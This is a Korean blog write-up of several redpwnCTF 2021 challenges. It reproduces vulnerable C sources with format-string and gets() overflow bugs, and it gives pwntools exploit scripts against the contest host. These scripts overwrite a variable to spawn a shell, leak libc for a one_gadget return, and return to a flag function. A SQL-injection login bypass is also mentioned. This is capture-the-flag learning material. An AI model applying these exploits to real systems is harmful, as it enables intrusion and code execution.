redpwnCTF 2021 write-up

CTF-Writeup 2021. 7. 11. 13:11

728x90

CRYPTO

baby

https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c

 

RSA decryption using only n e and c

I need to decrypt c and I was given only n, e and c and computing p and q or phi(n) would be close to impossible so what other alternatives do I have? I tried calculating p and q but I made very li...

stackoverflow.com

 참조

 

scissor

scissor -> 시저, 시저 암호로 돌리면됨

그럼 저 +12에 플래그처럼 보이는 부분이 있는데 flag{surroud~~}하면 됨

 

MISC

compliant-lattice-feline

 

pwnable

printf_please

포맷 스트링을 이용한 문제. %p를 마구 입력해서 나오는 hex값을 아스키값으로 바꾸면 됨

#include <stdio.h>
#include <fcntl.h>

int main(void)
{
  char buffer[0x200];
  char flag[0x200];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  memset(buffer, 0, sizeof(buffer));
  memset(flag, 0, sizeof(flag));

  int fd = open("flag.txt", O_RDONLY);
  if (fd == -1) {
    puts("failed to read flag. please contact an admin if this is remote");
    exit(1);
  }

  read(fd, flag, sizeof(flag));
  close(fd);

  puts("what do you say?");

  read(0, buffer, sizeof(buffer) - 1);
  buffer[strcspn(buffer, "\n")] = 0;

  if (!strncmp(buffer, "please", 6)) {
    printf(buffer); // 요기서 FSB가 터짐
    puts(" to you too!");
  }
}

'flag{pl3as3_pr1ntf_w1th_caut10n_9a3xl}'

 

Beginners-generic

bof가 터지고 단순히 inspirational_message_index를 -1로 바꿔주기만 하면 됨

#include <stdio.h>
#include <string.h>
#include <stdlib.h>


const char *inspirational_messages[] = {
  "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"",
  "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"",
  "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"",
};

int main(void)
{
  srand(time(0));
  long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *));
  char heartfelt_message[32];
  
  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts(inspirational_messages[inspirational_message_index]);
  puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!");
  puts("can you write me a heartfelt message to cheer me up? :(");

  gets(heartfelt_message); //bof

  if(inspirational_message_index == -1) {
    system("/bin/sh");
  }
}

Exploit

from pwn import *

p = remote('mc.ax', 31199)
#p = process('./beginner-generic-pwn-number-0')

p.sendlineafter(':(', "A"*40+p64(0xffffffffffffffff))

p.interactive()

 

Ret2the-unknown

 

#include <stdio.h>
#include <string.h>

int main(void)
{
  char your_reassuring_and_comforting_we_will_arrive_safely_in_libc[32];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts("that board meeting was a *smashing* success! rob loved the challenge!");
  puts("in fact, he loved it so much he sponsored me a business trip to this place called 'libc'...");
  puts("where is this place? can you help me get there safely?");

  // please i cant afford the medical bills if we crash and segfault
  gets(your_reassuring_and_comforting_we_will_arrive_safely_in_libc);

  puts("phew, good to know. shoot! i forgot!");
  printf("rob said i'd need this to get there: %llx\n", printf);
  puts("good luck!");
}

 

실행하면 printf주소를 남겨주는데, 이 printf주소를 릭해서 one_shot으로 때리면됨

그런데 주소를 출력해주고 끝나니 main_offset을 ret에 덮어서 다시 실행하게끔 하고 printf leak -> libc base leak -> one_gadget을 ret에 덮어 exploit

 

from pwn import *

#p = process('./ret2the-unknown')
p = remote('mc.ax', 31568)
e = ELF('./ret2the-unknown')
libc = ELF('./libc-2.28.so')

main_offset = e.sym.main
one_gadget = [0x4484f, 0x448a3, 0xe5456]
payload = "A"*40
payload += p64(main_offset)

p.sendlineafter('safely?', payload)

p.recvuntil('there: ')
leak_printf = int('0x' + p.recvline()[:-1], 16)
leak_libc = leak_printf - libc.sym.printf
one_shot = leak_libc + one_gadget[0]

payload1 = "A"*40
payload1 += p64(one_shot)
p.sendlineafter('safely?', payload1) 
p.interactive()

 

Ret2generic-flag

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void super_generic_flag_reading_function_please_ret_to_me()
{
  char flag[0x100] = {0};
  FILE *fp = fopen("./flag.txt", "r");
  if (!fp)
  {
    puts("no flag!! contact a member of rob inc");
    exit(-1);
  }
  fgets(flag, 0xff, fp);
  puts(flag);
  fclose(fp);
}

int main(void)
{
  char comments_and_concerns[32];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts("alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...");
  puts("how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!");
  puts("slap on some flavortext and there's no way rob will fire me now!");
  puts("this is genius!! what do you think?");

  gets(comments_and_concerns); // bof + rtl
}

 

단순히 super_generic_flag_reading_function_please_ret_to_me 함수의 주소를 ret에 덮기만 하면 끝

from pwn import *

p = remote('mc.ax', 31077)

p.sendlineafter('think?', "A"*40+p64(0x4011f6))
p.interactive()

REV

wstrings

ida에서 rodata쪽 보면 flag가 있는데, 이걸 그대로 입력해주면 끝

WEB

Inspect-me

F12로 보면 페이지 소스에 답이 있다

 

ORM-BAD

 

SQL-Injection 문제

 

ID와 PW모두 참이게 하면 끝

 

 

 

 

 

1인팀으로 최종 373등 마무리

 

+ 좀더 공부해야함을 느낀다...

 

pwn/simultaneity은 힙 주소받고, 214000이상이나 특정 값 이상 사이즈로 힙을 할당하면 mmap으로 할당하지만

그 이후로 어떻게 푸는지 몰라서 못풀었음

 

한번더 풀어보고 안되면 write-up봐야지..

 

 

바이너리 모음

https://github.com/redpwn/redpwnctf-2021-challenges

 

redpwn/redpwnctf-2021-challenges

Contribute to redpwn/redpwnctf-2021-challenges development by creating an account on GitHub.

github.com

 

728x90

'CTF-Writeup' 카테고리의 다른 글

Grabcon2021 Write-up  (0) 2021.09.17
DCTF 2021 Write-up  (0) 2021.08.23
corCTF 2021 Write-up  (0) 2021.08.23
RARCTF 2021  (0) 2021.08.10
2021 ImaginaryCTF writeup  (0) 2021.07.28